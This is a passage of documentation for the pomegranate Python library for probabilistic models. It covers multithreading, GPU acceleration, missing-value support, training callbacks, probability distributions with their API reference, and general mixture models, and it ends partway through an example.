between multiprocessing and multithreading?\n1. Multiprocessing involves creating a whole new Python process and passing the relevant data over to it. Multithreading involves creating multiple threads within the same Python process that all have access to the same memory. Multithreading is frequently more efficient because it doesn’t involve copying potentially large amounts of data between different Python processes.\n1. Why don’t all modules use multithreading?\n1. Python has the Global Interpreter Lock (GIL) enabled which prevents more than one thread to execute per processes. The work-around is multiprocessing, which simply creates multiple processes that each have one thread working. When one uses Cython, they can disable to GIL when using only C-level primitives. Since most of the compute-intensive tasks involve only C-level primitives, multithreading is a natural choice for pomegranate. In situations where the size of the data is small and the cost of transferring it from one process to another is negligible, then multithreading can simply make things more complicated.\n\n## GPU Usage¶\n\npomegranate has GPU accelerated matrix multiplications to speed up all operations involving multivariate Gaussian distributions and all models that use them. This has led to an approximately 4x speedup for multivariate Gaussian mixture models and HMMs compared to using BLAS only. This speedup seems to scale better with dimensionality, with higher dimensional models seeing a larger speedup than smaller dimensional ones.\n\nBy default, pomegranate will activate GPU acceleration if it can import cupy, otherwise it will default to BLAS. You can check whether pomegranate is using GPU acceleration with this built-in function:\n\n>>> import pomegranate\n>>> print(pomegranate.utils.is_gpu_enabled())\n\n\nIf you’d like to deactivate GPU acceleration you can use the following command:\n\n>>> pomegranate.utils.disable_gpu()\n\n\nLikewise, if you’d like to activate GPU acceleration you can use the following command:\n\n>>> pomegranate.utils.enable_gpu()\n\n\n### FAQ¶\n\n1. Why cupy and not Theano?\n1. pomegranate only needs to do matrix multiplications using a GPU. While Theano supports an impressive range of more complex operations, it did not have a simple interface to support a matrix-matrix multiplication in the same manner that cupy does.\n1. Why am I not seeing a large speedup with my GPU?\n1. There is a cost to transferring data to and from a GPU. It is possible that the GPU isn’t fast enough, or that there isn’t enough data to utilize the massively parallel aspect of a GPU for your dataset.\n1. Does pomegranate work using my type of GPU?\n1. The supported GPUs will be better documented on the cupy package.\n1. Is multi-GPU supported?\n1. Currently, no. In theory it should be possible, though.\n\n## Missing Values¶\n\nAs of version 0.9.0, pomegranate supports missing values for almost all methods. This means that models can be fit to data sets that have missing values in them, inference can be done on samples that have missing values, and even structure learning can be done in the presence of missing values. Currently, this support exists in the form of calculating sufficient statistics with respect to only the variables that are present in a sample and ignoring the missing values, in contrast to imputing the missing values and using those for the estimation.\n\nMissing value support was added in a manner that requires the least user thought. All one has to do is add numpy.nan to mark an entry as missing for numeric data sets, or the string 'nan' for string data sets. pomegranate will automatically handle missing values appropriately. The functions have been written in such a way to minimize the overhead of missing value support, by only acting differently when a missing value is found. However, it may take some models longer to do calculations in the presence of missing values than on dense data. For example, when calculating the log probability of a sample under a multivariate Gaussian distribution one can typically use BLAS or a GPU since a dot product is taken between the data and the inverse covariance matrix. Unfortunately, since missing data can occur in any of the columns, a new inverse covariance matrix has to be calculated for each sample and BLAS cannot be utilized at all.\n\nAs an example, when fitting a NormalDistribution to a vector of data, the parameters are estimated simply by ignoring the missing values. A data set with 100 observations and 50 missing values would produce the same model as a data set comprised simply of the 100 observations. This comes into play when fitting multivariate models, like an IndependentComponentsDistribution, because each distribution is fit to only the observations for their specific feature. This means that samples where some values are missing can still be utilized in the dimensions where they are observed. This can lead to more robust estimates that by imputing the missing values using the mean or median of the column.\n\nHere is an example of fitting a univariate distribution to data sets with missing values:\n\n>>> import numpy\n>>> from pomegranate import *\n>>>\n>>> X = numpy.random.randn(100)\n>>> X[75:] = numpy.nan\n>>>\n>>> NormalDistribution.from_samples(X)\n{\n\"frozen\" :false,\n\"class\" :\"Distribution\",\n\"parameters\" :[\n-0.0007138484812874587,\n1.0288813172046551\n],\n\"name\" :\"NormalDistribution\"\n}\n>>> NormalDistribution.from_samples(X[:75])\n{\n\"frozen\" :false,\n\"class\" :\"Distribution\",\n\"parameters\" :[\n-0.0007138484812874587,\n1.0288813172046551\n],\n\"name\" :\"NormalDistribution\"\n}\n\n\nMultivariate Gaussian distributions take a slightly more complex approach. The means of each column are computed using the available data, but the covariance is calculated using sufficient statistics calculated from pairs of variables that exist in a sample. For example, if the sample was (2.0, 1.7, numpy.nan), then sufficient statistics would be calculated for the variance of the first and second variables as well as the covariance between the two, but nothing would be updated about the third variable.\n\nAll univariate distributions return a probability of 1 for missing data. This is done to support inference algorithms in more complex models. For example, when running the forward algorithm in a hidden Markov model in the presence of missing data, one would simply ignore the emission probability for the steps where the symbol is missing. This means that when getting to the step when a missing symbol is being aligned to each of the states, the cost is simply the transition probability to that state, instead of the transition probability multiplied by the likelihood of that symbol under that states’ distribution (or, equivalently, having a likelihood of 1.) Under a Bayesian network, the probability of a sample is just the product of probabilities under distributions where the sample is fully observed.\n\nSee the tutorial for more examples of missing value support in pomegranate!\n\n### FAQ¶\n\n1. How do I indicate that a value is missing in a data set?\n1. If it is a numeric data set, indicate that a value is missing using numpy.nan. If it is strings (such as ‘A’, ‘B’, etc…) use the string 'nan'. If your strings are stored in a numpy array, make sure that the full string ‘nan’ is present. numpy arrays have a tendancy to truncate longer strings if they’re defined over shorter strings (like an array containing ‘A’ and ‘B’ might truncate ‘nan’ to be ‘n’).\n1. Are all algorithms supported?\n1. Almost all! The only known non-supported function is Chow-Liu tree building. You can fit a Gaussian Mixture Model, run k-means clustering, decode a sequence using the Viterbi algorithm for a hidden Markov model, and learn the structure of a Bayesian network on data sets with missing values now!\n1. It is much slower to fit models using multivariate Gaussian distributions to missing data. Why?\n1. When calculating the log probability of a point with missing values, a new inverse covariance matrix needs to be calculated over the subset of variables that are observed. This is a double whammy for speed because you need to (1) invert a matrix once per sample, and (2) cannot use BLAS for the calculation since there is no fixed sized covariance matrix to operate with.\n1. Performance on data sets without missing values appears to be worse now. What should I do?\n1. Please report it on the GitHub issue tracker or email me. I have tried to minimize overhead in as many places as I can, but I have not run speed tests on all cases. Please include a sample script, and the amount of time it took.\n\n## Callbacks¶\n\nCallback refer to functions that should be executing during the training procedure. These functions can be executed either at the start of training, the end of each epoch, or at the end of training. They mirror in style the callbacks from keras, and so are passed in using the callbacks keyword in fit and from_sample methods.\n\nIn pomegranate, a callback is an object that inherits from the pomegranate.callbacks.Callback object and has the following three methods implemented or inherited:\n\n• on_training_begin(self) : What should happen when training begins.\n• on_epoch_end(self, logs) : What should happen at the end of an epoch. The model will pass a dictionary of logs to each callback with each call that includes summary information about the training. The logs file is described more in depth below.\n• on_training_end(self, logs) : What should happen when training ends. The final set of logs is passed in as well.\n\nThe log dictionary that is returned has the following entries:\n\n• epoch : int, the iteration or epoch that the model is currently on\n• improvement : float, the improvement since the latest iteration in the training set log probability\n• total_improvement : float, the total improvement seen in the training set log probability since the beginning of training\n• log_probability : float, the log probability of the training set after this round of training\n• last_log_probability : float, the log probability of the training set before this round of training\n• duration : float, the time in seconds that this epoch took\n• epoch_start_time : the time accoding to time.time() that this epoch began\n• epoch_end_time: the time according to time.time() that this epoch eded\n• n_seen_batches : int, the number of batches that have been seen by the model, only useful for mini-batching\n• learning_rate : The learning rate. This is undefined except when a decaying learning rate is set.\n\nThe following callbacks are built in to pomegranate:\n\n1. History(): This will keep track of the above values in respective lists, e.g., history.epochs and history.improvements. This callback is automatically run by all models, and is returned when return_history=True is passed in.\nfrom pomegranate.callbacks import History\nfrom pomegranate import *\n\nmodel = HiddenMarkovModel.from_samples(X) # No history returned\nmodel, history = HiddenMarkovModel.from_samples(X, return_history=True)\n\n1. ModelCheckpoint(name=None, verbose=True): This callback will save the model parameters to a file named {name}.{epoch}.json at the end of each epoch. By default the name is the name of the model, but that can be overriden with the name passed in to the callback object. The verbosity flag indicates if it should print a message to the screen indicating that a file was saved, and where to, at the end of each epoch.\n>>> from pomegranate.callbacks import ModelCheckpoint\n>>> from pomegranate import *\n>>> HiddenMarkovModel.from_samples(X, callbacks=[ModelCheckpoint()])\n\n1. CSVLogger(filename, separator=',', append=False): This callback will save the statistics from the logs dictionary to rows in a file at the end of each epoch. The filename specifies where to save the logs to, the separator is the symbol to separate values, and append indicates whether to save to the end of a file or to overwrite it, if it currently exists.\n>>> from pomegranate.callbacks import CSVLogger, ModelCheckpoint\n>>> from pomegranate import *\n>>> HiddenMarkovModel.from_samples(X, callbacks=[CSVLogger('model.logs'), ModelCheckpoint()])\n\n1. LambdaCallback(on_training_begin=None, on_training_end=None, on_epoch_end=None): A convenient wrapper that allows you to pass functions in that get executed at the appropriate points. The function on_epoch_end and on_training_end should accept a single argument, the dictionary of logs, as described above.\n>>> from pomegranate.callbacks import LambdaCheckpoint\n>>> from pomegranate import *\n>>>\n>>> def on_training_end(logs):\n>>> print \"Total Improvement: {:4.4}\".format(logs['total_improvement'])\n>>>\n>>> HiddenMarkovModel.from_samples(X, callbacks=[LambdaCheckpoint(on_training_end=on_training_end)])\n\n\n## Probability Distributions¶\n\nIPython Notebook Tutorial\n\nWhile probability distributions are frequently used as components of more complex models such as mixtures and hidden Markov models, they can also be used by themselves. Many data science tasks require fitting a distribution to data or generating samples under a distribution. pomegranate has a large library of both univariate and multivariate distributions which can be used with an intuitive interface.\n\nUnivariate Distributions\n\n UniformDistribution A uniform distribution between two values. BernoulliDistribution A Bernoulli distribution describing the probability of a binary variable. NormalDistribution A normal distribution based on a mean and standard deviation. LogNormalDistribution A lognormal distribution over non-negative floats. ExponentialDistribution Represents an exponential distribution on non-negative floats. PoissonDistribution The probability of a number of events occuring in a fixed time window. BetaDistribution A beta-bernoulli distribution. GammaDistribution This distribution represents a gamma distribution, parameterized in the alpha/beta (shape/rate) parameterization. DiscreteDistribution A discrete distribution, made up of characters and their probabilities, assuming that these probabilities will sum to 1.0.\n\nKernel Densities\n\n GaussianKernelDensity A quick way of storing points to represent a Gaussian kernel density in one dimension. UniformKernelDensity A quick way of storing points to represent an Exponential kernel density in one dimension. TriangleKernelDensity A quick way of storing points to represent an Exponential kernel density in one dimension.\n\nMultivariate Distributions\n\n IndependentComponentsDistribution Allows you to create a multivariate distribution, where each distribution is independent of the others. MultivariateGaussianDistribution DirichletDistribution A Dirichlet distribution, usually a prior for the multinomial distributions. ConditionalProbabilityTable A conditional probability table, which is dependent on values from at least one previous distribution but up to as many as you want to encode for. JointProbabilityTable A joint probability table.\n\nWhile there are a large variety of univariate distributions, multivariate distributions can be made from univariate distributions by using IndependentComponentsDistribution with the assumption that each column of data is independent from the other columns (instead of being related by a covariance matrix, like in multivariate gaussians). Here is an example:\n\nd1 = NormalDistribution(5, 2)\nd2 = LogNormalDistribution(1, 0.3)\nd3 = ExponentialDistribution(4)\nd = IndependentComponentsDistribution([d1, d2, d3])\n\n\nUse MultivariateGaussianDistribution when you want the full correlation matrix within the feature vector. When you want a strict diagonal correlation (i.e no correlation or “independent”), this is achieved using IndependentComponentsDistribution with NormalDistribution for each feature. There is no implementation of spherical or other variations of correlation.\n\n### Initialization¶\n\nInitializing a distribution is simple and done just by passing in the distribution parameters. For example, the parameters of a normal distribution are the mean (mu) and the standard deviation (sigma). We can initialize it as follows:\n\nfrom pomegranate import *\na = NormalDistribution(5, 2)\n\n\nHowever, frequently we don’t know the parameters of the distribution beforehand or would like to directly fit this distribution to some data. We can do this through the from_samples class method.\n\nb = NormalDistribution.from_samples([3, 4, 5, 6, 7])\n\n\nIf we want to fit the model to weighted samples, we can just pass in an array of the relative weights of each sample as well.\n\nb = NormalDistribution.from_samples([3, 4, 5, 6, 7], weights=[0.5, 1, 1.5, 1, 0.5])\n\n\n### Probability¶\n\nDistributions are typically used to calculate the probability of some sample. This can be done using either the probability or log_probability methods.\n\n>>> a = NormalDistribution(5, 2)\n>>> a.log_probability(8)\n-2.737085713764219\n>>> a.probability(8)\n0.064758797832971712\n>>> b = NormalDistribution.from_samples([3, 4, 5, 6, 7], weights=[0.5, 1, 1.5, 1, 0.5])\n>>> b.log_probability(8)\n-4.437779569430167\n\n\nThese methods work for univariate distributions, kernel densities, and multivariate distributions all the same. For a multivariate distribution you’ll have to pass in an array for the full sample.\n\n>>> d1 = NormalDistribution(5, 2)\n>>> d2 = LogNormalDistribution(1, 0.3)\n>>> d3 = ExponentialDistribution(4)\n>>> d = IndependentComponentsDistribution([d1, d2, d3])\n>>>\n>>> X = [6.2, 0.4, 0.9]\n>>> d.log_probability(X)\n-23.205411733352875\n\n\n### Fitting¶\n\nWe may wish to fit the distribution to new data, either overriding the previous parameters completely or moving the parameters to match the dataset more closely through inertia. Distributions are updated using maximum likelihood estimates (MLE). Kernel densities will either discard previous points or downweight them if inertia is used.\n\nd = NormalDistribution(5, 2)\nd.fit([1, 5, 7, 3, 2, 4, 3, 5, 7, 8, 2, 4, 6, 7, 2, 4, 5, 1, 3, 2, 1])\nd\n{\n\"frozen\" :false,\n\"class\" :\"Distribution\",\n\"parameters\" :[\n3.9047619047619047,\n2.13596776114341\n],\n\"name\" :\"NormalDistribution\"\n}\n\n\nTraining can be done on weighted samples by passing an array of weights in along with the data for any of the training functions, like the following:\n\nd = NormalDistribution(5, 2)\nd.fit([1, 5, 7, 3, 2, 4], weights=[0.5, 0.75, 1, 1.25, 1.8, 0.33])\nd\n{\n\"frozen\" :false,\n\"class\" :\"Distribution\",\n\"parameters\" :[\n3.538188277087034,\n1.954149818564894\n],\n\"name\" :\"NormalDistribution\"\n}\n\n\nTraining can also be done with inertia, where the new value will be some percentage the old value and some percentage the new value, used like d.from_samples([5,7,8], inertia=0.5) to indicate a 50-50 split between old and new values.\n\n### API Reference¶\n\nFor detailed documentation and examples, see the README.\n\nclass pomegranate.distributions.BernoulliDistribution\n\nA Bernoulli distribution describing the probability of a binary variable.\n\nfrom_summaries()\n\nUpdate the parameters of the distribution from the summaries.\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nclass pomegranate.distributions.BetaDistribution\n\nA beta-bernoulli distribution.\n\nThis object is a beta-bernoulli distribution. This means that it uses a beta distribution to model the distribution of values that the rate value can take rather than it being a single number.\n\nThis should not be confused with a Beta distribution by itself.\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfrom_summaries()\n\nUse the summaries in order to update the distribution.\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nclass pomegranate.distributions.ConditionalProbabilityTable\n\nA conditional probability table, which is dependent on values from at least one previous distribution but up to as many as you want to encode for.\n\nbake()\n\nOrder the inputs according to some external global ordering.\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfit()\n\nUpdate the parameters of the table based on the data.\n\nfrom_samples()\n\nLearn the table from data.\n\nfrom_summaries()\n\nUpdate the parameters of the distribution using sufficient statistics.\n\njoint()\n\nThis will turn a conditional probability table into a joint probability table. If the data is already a joint, it will likely mess up the data. It does so by scaling the parameters the probabilities by the parent distributions.\n\nkeys()\n\nReturn the keys of the probability distribution which has parents, the child variable.\n\nlog_probability()\n\nReturn the log probability of a value, which is a tuple in proper ordering, like the training data.\n\nmarginal()\n\nCalculate the marginal of the CPT. This involves normalizing to turn it into a joint probability table, and then summing over the desired value.\n\nsample()\n\nReturn a random sample from the conditional probability table.\n\nsummarize()\n\nSummarize the data into sufficient statistics to store.\n\nto_json()\n\nSerialize the model to a JSON.\n\nParameters: separators : tuple, optional The two separators to pass to the json.dumps function for formatting. Default is (‘,’, ‘ : ‘). indent : int, optional The indentation to use at each level. Passed to json.dumps for formatting. Default is 4. json : str A properly formatted JSON object.\nclass pomegranate.distributions.DirichletDistribution\n\nA Dirichlet distribution, usually a prior for the multinomial distributions.\n\nclear_summaries()\n\nClear the summary statistics stored in the object. Parameters ———- None Returns ——- None\n\nfit()\n\nSet the parameters of this Distribution to maximize the likelihood of the given sample. Items holds some sort of sequence. If weights is specified, it holds a sequence of value to weight each item by.\n\nfrom_samples()\n\nFit a distribution to some data without pre-specifying it.\n\nfrom_summaries()\n\nUpdate the internal parameters of the distribution.\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nclass pomegranate.distributions.DiscreteDistribution\n\nA discrete distribution, made up of characters and their probabilities, assuming that these probabilities will sum to 1.0.\n\nbake()\n\nEncoding the distribution into integers.\n\nclamp()\n\nReturn a distribution clamped to a particular value.\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nequals()\n\nReturn if the keys and values are equal\n\nfit()\n\nSet the parameters of this Distribution to maximize the likelihood of the given sample. Items holds some sort of sequence. If weights is specified, it holds a sequence of value to weight each item by.\n\nfrom_samples()\n\nFit a distribution to some data without pre-specifying it.\n\nfrom_summaries()\n\nUse the summaries in order to update the distribution.\n\nitems()\n\nReturn items of the underlying dictionary.\n\nkeys()\n\nReturn the keys of the underlying dictionary.\n\nlog_probability()\n\nReturn the log prob of the X under this distribution.\n\nmle()\n\nReturn the maximally likely key.\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nsummarize()\n\nReduce a set of observations to sufficient statistics.\n\nto_json()\n\nSerialize the distribution to a JSON.\n\nParameters: separators : tuple, optional The two separators to pass to the json.dumps function for formatting. Default is (‘,’, ‘ : ‘). indent : int, optional The indentation to use at each level. Passed to json.dumps for formatting. Default is 4. json : str A properly formatted JSON object.\nvalues()\n\nReturn values of the underlying dictionary.\n\nclass pomegranate.distributions.ExponentialDistribution\n\nRepresents an exponential distribution on non-negative floats.\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfrom_summaries()\n\nTakes in a series of summaries, represented as a mean, a variance, and a weight, and updates the underlying distribution. Notes on how to do this for a Gaussian distribution were taken from here: http://math.stackexchange.com/questions/453113/how-to-merge-two-gaussians\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nclass pomegranate.distributions.GammaDistribution\n\nThis distribution represents a gamma distribution, parameterized in the alpha/beta (shape/rate) parameterization. ML estimation for a gamma distribution, taking into account weights on the data, is nontrivial, and I was unable to find a good theoretical source for how to do it, so I have cobbled together a solution here from less-reputable sources.\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfit()\n\nSet the parameters of this Distribution to maximize the likelihood of the given sample. Items holds some sort of sequence. If weights is specified, it holds a sequence of value to weight each item by. In the Gamma case, likelihood maximization is necesarily numerical, and the extension to weighted values is not trivially obvious. The algorithm used here includes a Newton-Raphson step for shape parameter estimation, and analytical calculation of the rate parameter. The extension to weights is constructed using vital information found way down at the bottom of an Experts Exchange page. Newton-Raphson continues until the change in the parameter is less than epsilon, or until iteration_limit is reached See: http://en.wikipedia.org/wiki/Gamma_distribution http://www.experts-exchange.com/Other/Math_Science/Q_23943764.html\n\nfrom_summaries()\n\nSet the parameters of this Distribution to maximize the likelihood of the given sample given the summaries which have been stored. In the Gamma case, likelihood maximization is necesarily numerical, and the extension to weighted values is not trivially obvious. The algorithm used here includes a Newton-Raphson step for shape parameter estimation, and analytical calculation of the rate parameter. The extension to weights is constructed using vital information found way down at the bottom of an Experts Exchange page. Newton-Raphson continues until the change in the parameter is less than epsilon, or until iteration_limit is reached See: http://en.wikipedia.org/wiki/Gamma_distribution http://www.experts-exchange.com/Other/Math_Science/Q_23943764.html\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nsummarize()\n\nTake in a series of items and their weights and reduce it down to a summary statistic to be used in training later.\n\nclass pomegranate.distributions.IndependentComponentsDistribution\n\nAllows you to create a multivariate distribution, where each distribution is independent of the others. Distributions can be any type, such as having an exponential represent the duration of an event, and a normal represent the mean of that event. Observations must now be tuples of a length equal to the number of distributions passed in.\n\ns1 = IndependentComponentsDistribution([ExponentialDistribution(0.1),\nNormalDistribution(5, 2)])\n\ns1.log_probability((5, 2))\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfit()\n\nSet the parameters of this Distribution to maximize the likelihood of the given sample. Items holds some sort of sequence. If weights is specified, it holds a sequence of value to weight each item by.\n\nfrom_samples()\n\nCreate a new independent components distribution from data.\n\nfrom_summaries()\n\nUse the collected summary statistics in order to update the distributions.\n\nlog_probability()\n\nWhat’s the probability of a given tuple under this mixture? It’s the product of the probabilities of each X in the tuple under their respective distribution, which is the sum of the log probabilities.\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nsummarize()\n\nTake in an array of items and reduce it down to summary statistics. For a multivariate distribution, this involves just passing the appropriate data down to the appropriate distributions.\n\nto_json()\n\nConvert the distribution to JSON format.\n\nclass pomegranate.distributions.JointProbabilityTable\n\nA joint probability table. The primary difference between this and the conditional table is that the final column sums to one here. The joint table can be thought of as the conditional probability table normalized by the marginals of each parent.\n\nbake()\n\nOrder the inputs according to some external global ordering.\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfit()\n\nUpdate the parameters of the table based on the data.\n\nfrom_samples()\n\nLearn the table from data.\n\nfrom_summaries()\n\nUpdate the parameters of the table.\n\nlog_probability()\n\nReturn the log probability of a value, which is a tuple in proper ordering, like the training data.\n\nmarginal()\n\nDetermine the marginal of this table with respect to the index of one variable. The parents are index 0..n-1 for n parents, and the final variable is either the appropriate value or -1. For example: table = A B C p(C) … data … table.marginal(0) gives the marginal wrt A table.marginal(1) gives the marginal wrt B table.marginal(2) gives the marginal wrt C table.marginal(-1) gives the marginal wrt C\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nsummarize()\n\nSummarize the data into sufficient statistics to store.\n\nto_json()\n\nSerialize the model to a JSON.\n\nParameters: separators : tuple, optional The two separators to pass to the json.dumps function for formatting. Default is (‘,’, ‘ : ‘). indent : int, optional The indentation to use at each level. Passed to json.dumps for formatting. Default is 4. json : str A properly formatted JSON object.\nclass pomegranate.distributions.LogNormalDistribution\n\nA lognormal distribution over non-negative floats.\n\nThe parameters are the mu and sigma of the normal distribution, which is the the exponential of the log normal distribution.\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfrom_summaries()\n\nTakes in a series of summaries, represented as a mean, a variance, and a weight, and updates the underlying distribution. Notes on how to do this for a Gaussian distribution were taken from here: http://math.stackexchange.com/questions/453113/how-to-merge-two-gaussians\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nclass pomegranate.distributions.MultivariateGaussianDistribution\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfrom_samples()\n\nFit a distribution to some data without pre-specifying it.\n\nfrom_summaries()\n\nSet the parameters of this Distribution to maximize the likelihood of the given sample. Items holds some sort of sequence. If weights is specified, it holds a sequence of value to weight each item by.\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nclass pomegranate.distributions.NormalDistribution\n\nA normal distribution based on a mean and standard deviation.\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfrom_summaries()\n\nTakes in a series of summaries, represented as a mean, a variance, and a weight, and updates the underlying distribution. Notes on how to do this for a Gaussian distribution were taken from here: http://math.stackexchange.com/questions/453113/how-to-merge-two-gaussians\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nclass pomegranate.distributions.PoissonDistribution\n\nThe probability of a number of events occuring in a fixed time window.\n\nA probability distribution which expresses the probability of a number of events occurring in a fixed time window. It assumes these events occur with at a known rate, and independently of each other. It can operate over both integer and float values.\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfrom_summaries()\n\nTakes in a series of summaries, consisting of the minimum and maximum of a sample, and determine the global minimum and maximum.\n\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nclass pomegranate.distributions.UniformDistribution\n\nA uniform distribution between two values.\n\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nfrom_summaries()\n\nTakes in a series of summaries, consisting of the minimum and maximum of a sample, and determine the global minimum and maximum.\n\nsample()\n\nSample from this uniform distribution and return the value sampled.\n\n## General Mixture Models¶\n\nIPython Notebook Tutorial\n\nGeneral Mixture models (GMMs) are an unsupervised probabilistic model composed of multiple distributions (commonly referred to as components) and corresponding weights. This allows you to model more complex distributions corresponding to a singular underlying phenomena. For a full tutorial on what a mixture model is and how to use them, see the above tutorial.\n\n### Initialization¶\n\nGeneral Mixture Models can be initialized in two ways depending on if you know the initial parameters of the model or not: (1) passing in a list of pre-initialized distributions, or (2) running the from_samples class method on data. The initial parameters can be either a pre-specified model that is ready to be used for prediction, or the initialization for expectation-maximization. Otherwise, if the second initialization option is chosen, then k-means is used to initialize the distributions. The distributions passed for each component don’t have to be the same type, and if an IndependentComponentDistribution object is passed in, then the dimensions don’t need to be modeled by the same distribution.\n\nHere is an example of a traditional multivariate Gaussian mixture where we pass in pre-initialized distributions. We can also pass in the weight of each component, which serves as the prior probability of a sample belonging to that component when doing predictions.\n\n>>> from pomegranate import *\n>>> d1 = MultivariateGaussianDistribution([1, 6, 3], [[1, 0, 0], [0, 1, 0], [0, 0, 1]])\n>>> d2 = MultivariateGaussianDistribution([2, 8, 4], [[1, 0, 0], [0, 1, 0], [0, 0, 2]])\n>>> d3 = MultivariateGaussianDistribution([0, 4, 8], [[2, 0, 0], [0, 3, 0], [0, 0, 1]])\n>>> model = GeneralMixtureModel([d1, d2, d3], weights=[0.25, 0.60, 0.15])\n\n\nAlternatively, if we want to model each dimension differently, then we can replace the multivariate Gaussian distributions with IndependentComponentsDistribution objects.\n\n>>> from pomegranate import *\n>>> d1 = IndependentComponentsDistributions([NormalDistribution(5, 2), ExponentialDistribution(1), LogNormalDistribution(0.4, 0.1)])\n>>> d2 = IndependentComponentsDistributions([NormalDistribution(3, 1), ExponentialDistribution(2), LogNormalDistribution(0.8, 0.2)])\n>>> model = GeneralMixtureModel([d1, d2], weights=[0.66, 0.34])\n\n\nIf we do not know the parameters of our distributions beforehand and want to learn them entirely from data, then we can use the from_samples class method. This method will run k-means to initialize the components, using the returned clusters to initialize all parameters of the distributions, i.e. both mean and covariances for multivariate Gaussian distributions. Afterwards, expectation-maximization is used to refine the parameters of the model, iterating until convergence.\n\n>>> from pomegranate import *\n>>> model = GeneralMixtureModel.from_samples(MultivariateGaussianDistribution, n_components=3, X=X)\n\n\nIf we want to model each dimension using a different distribution, then we can pass in a list of callables and they will be initialized using k-means as well.\n\n>>> from pomegranate import *\n>>> model = GeneralMixtureModel.from_samples([NormalDistribution, ExponentialDistribution, LogNormalDistribution], n_components=5, X=X)\n\n\n### Probability¶\n\nThe probability of a point is the sum of its probability under each of the components, multiplied by the weight of each component c, $$P = \\sum\\limits_{i \\in M} P(D|M_{i})P(M_{i})$$. The probability method returns the probability of each sample under the entire mixture, and the log_probability method returns the log of that value.\n\n### Prediction¶\n\nThe common prediction tasks involve predicting which component a new point falls under. This is done using Bayes rule $$P(M|D) = \\frac{P(D|M)P(M)}{P(D)}$$ to determine the posterior probability $$P(M|D)$$ as opposed to simply the likelihood $$P(D|M)$$. Bayes rule indicates that it isn’t simply the likelihood function which makes this prediction but the likelihood function multiplied by the probability that that distribution generated the sample. For example, if you have a distribution which has 100x as many samples fall under it, you would naively think that there is a ~99% chance that any random point would be drawn from it. Your belief would then be updated based on how well the point fit each distribution, but the proportion of points generated by each sample is important as well.\n\nWe can get the component label assignments using model.predict(data), which will return an array of indexes corresponding to the maximally likely component. If what we want is the full matrix of $$P(M|D)$$, then we can use model.predict_proba(data), which will return a matrix with each row being a sample, each column being a component, and each cell being the probability that that model generated that data. If we want log probabilities instead we can use model.predict_log_proba(data) instead.\n\n### Fitting¶\n\nTraining GMMs faces the classic chicken-and-egg problem that most unsupervised learning algorithms face. If we knew which component a sample belonged to, we could use MLE estimates to update the component. And if we knew the parameters of the components we could predict which sample belonged to which component. This problem is solved using expectation-maximization, which iterates between the two until convergence. In essence, an initialization point is chosen which usually is not a very good start, but through successive iteration steps, the parameters converge to a good ending.\n\nThese models are fit using model.fit(data). A maximum number of iterations can be specified as well as a stopping threshold for the improvement ratio. See the API reference for full documentation.\n\n### API Reference¶\n\nclass pomegranate.gmm.GeneralMixtureModel\n\nA General Mixture Model.\n\nThis mixture model can be a mixture of any distribution as long as they are all of the same dimensionality. Any object can serve as a distribution as long as it has fit(X, weights), log_probability(X), and summarize(X, weights)/from_summaries() methods if out of core training is desired.\n\nParameters: distributions : array-like, shape (n_components,) The components of the model as initialized distributions. weights : array-like, optional, shape (n_components,) The prior probabilities corresponding to each component. Does not need to sum to one, but will be normalized to sum to one internally. Defaults to None.\n\nExamples\n\n>>> from pomegranate import *\n>>>\n>>> d1 = NormalDistribution(5, 2)\n>>> d2 = NormalDistribution(1, 1)\n>>>\n>>> clf = GeneralMixtureModel([d1, d2])\n>>> clf.log_probability(5)\n-2.304562194038089\n>>> clf.predict_proba([, , ])\narray([[ 0.99932952, 0.00067048],\n[ 0.99999995, 0.00000005],\n[ 0.06337894, 